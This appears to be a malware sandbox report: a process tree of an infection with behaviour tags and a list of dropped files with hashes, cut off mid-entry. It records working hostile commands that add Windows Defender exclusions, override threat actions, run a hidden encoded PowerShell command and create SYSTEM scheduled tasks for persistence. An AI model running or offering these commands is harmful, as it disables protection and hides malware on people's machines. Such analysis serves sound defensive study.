powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LUWSYkNLogUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RgdiTWAdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLLzADClkagU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wGxkUGMqSkfBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\KTrRWZTJHHaefVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LUWSYkNLogUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5072

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RgdiTWAdU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLLzADClkagU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2256

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wGxkUGMqSkfBC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2432

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\KTrRWZTJHHaefVVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:32
3⤵
PID:2928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YJilzFkIuuIZSMIOq /t REG_DWORD /d 0 /reg:64
3⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:32
3⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTXlTkGoDPQchyzd /t REG_DWORD /d 0 /reg:64
3⤵
PID:968

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gEfljGhZS" /SC once /ST 03:43:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3612

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gEfljGhZS"
2⤵
PID:3312

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gEfljGhZS"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zjtCPqTOixnxYITTP" /SC once /ST 05:27:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe\" XQ /bqbkdidyQ 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2432

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "zjtCPqTOixnxYITTP"
2⤵
PID:3240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 788
2⤵
- Program crash
PID:1016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1424

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4888

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1768

C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe
C:\Windows\Temp\ZTXlTkGoDPQchyzd\lpqXtBmqZCeDwrZ\kKGgJLM.exe XQ /bqbkdidyQ 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:3744

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:3336

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:4648

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:4500

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:4760

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:1236

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:3024

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:4344

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:3300

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:4024

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:840

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:4712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1768

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:5080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bjeWJKrHnPpdAGCduF"
2⤵
PID:3228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:4612

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:4268

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3876

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:4640

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RgdiTWAdU\ibnZZl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gwLAkOfFqvEnRPY" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2624

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwLAkOfFqvEnRPY2" /F /xml "C:\Program Files (x86)\RgdiTWAdU\rbamWFx.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3200

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "gwLAkOfFqvEnRPY"
2⤵
PID:2624

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwLAkOfFqvEnRPY"
2⤵
PID:3352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "pkYJRvtpGfZaSU" /F /xml "C:\Program Files (x86)\dLLzADClkagU2\EhbGVIS.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3612

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yMFQLDLxyvLyt2" /F /xml "C:\ProgramData\KTrRWZTJHHaefVVB\IRsHPLF.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:4640

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "raxKGaIGjdREsorgF2" /F /xml "C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\ErwKKvV.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JnvrxUwmUummIDFugIt2" /F /xml "C:\Program Files (x86)\wGxkUGMqSkfBC\tpuapcA.xml" /RU "SYSTEM"
2⤵
- Scheduled Task/Job: Scheduled Task
PID:4268

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mFeioppqsVnzBGRpZ" /SC once /ST 00:29:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll\",#1 /OdidyjGN 525403" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3244

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mFeioppqsVnzBGRpZ"
2⤵
PID:1060

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "zjtCPqTOixnxYITTP"
2⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 1984
2⤵
- Program crash
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4972 -ip 4972
1⤵
PID:1112

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll",#1 /OdidyjGN 525403
1⤵
PID:4812

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTXlTkGoDPQchyzd\aLakUjUQ\ewVUavl.dll",#1 /OdidyjGN 525403
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1416

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mFeioppqsVnzBGRpZ"
3⤵
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1840 -ip 1840
1⤵
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3720 -ip 3720
1⤵
PID:2644

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1372

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
Filesize
129B

MD5
a526b9e7c716b3489d8cc062fbce4005

SHA1
2df502a944ff721241be20a9e449d2acd07e0312

SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
Filesize
2.5MB

MD5
f71c44244ea98089b8c1d0f0ba01c5f8

SHA1
5556e9e726025291597f1fb746826a0980f0f938

SHA256
8649789341e2d9c2e3aaff2f0f0f3419be4df9946d5d91917025bcacc067d8a0

SHA512
e0b8b05df657e710d7ebcd8d204cc4c8928e611bb99f5a5c886a2efaf723cfc1a25656b627f7fe928eb428dd9b2879e8150f3ed65b6af8b7d18e58a309d3fb25

Download Submit
C:\ProgramData\EGIJKEHCAKFC\EHDAFI
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\EGIJKEHCAKFC\GCFCFC
Filesize
100KB

MD5
45504a732c2261ea90b34d223cc73ea9

SHA1
4726c7f640a60a2d96cd7c2d7dc347bee38a38b4

SHA256
19ca1fc27a0eaaeddb5cc49534603aaa35ea17199b002cfb7af33647b0ef0d6e

SHA512
37a2c201ef424e1555bb097aa834e5a83b1c98d57fff71a94ab1bc88e6fd519e35e4a55bd694a914b1257379b9fa241f3d6e4f402dd0517ca565c9300c538711

Download Submit
C:\ProgramData\freebl3.dll
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe
Filesize
3.2MB

MD5
a5efc85ce9876e9b33b1ad93a9c6ef56

SHA1
9e6d978e11ccc12b38c143d178fe88451422f7d2

SHA256
323f098cbfe46f8f46475f10e2d472bf34d784adf2d4210b8db3c4ebb84e3a44

SHA512
a14c500fb8fdd068d918ced496b8e040d3d878ce14b75462904c6fe8130d5ab96220875ea40aa487d53c7f45d4f3460409a7c43d19fb4b4729886b712bca44c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
11KB

MD5
cd86f36eb27163ae45ca4da1c64d2d22

SHA1
7f683be56580f91d7158f3db163661a20c4efed1

SHA256
b48c533ba6a7c06e1f2398d0f6de341ceb614dda8800d96f17617b926dcc49d3

SHA512
77ea50c0f4e32d949dee61b3eb11c92c8f6d05ca251d11a18789ccb54c2af4d64a3395dd9ffc25b759993906480f32f4ab8a2432f24da4771121b14d21dca556

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
36KB

MD5
14a1e3e75aeef32f9c22ddc3a1ce4e6f

SHA1
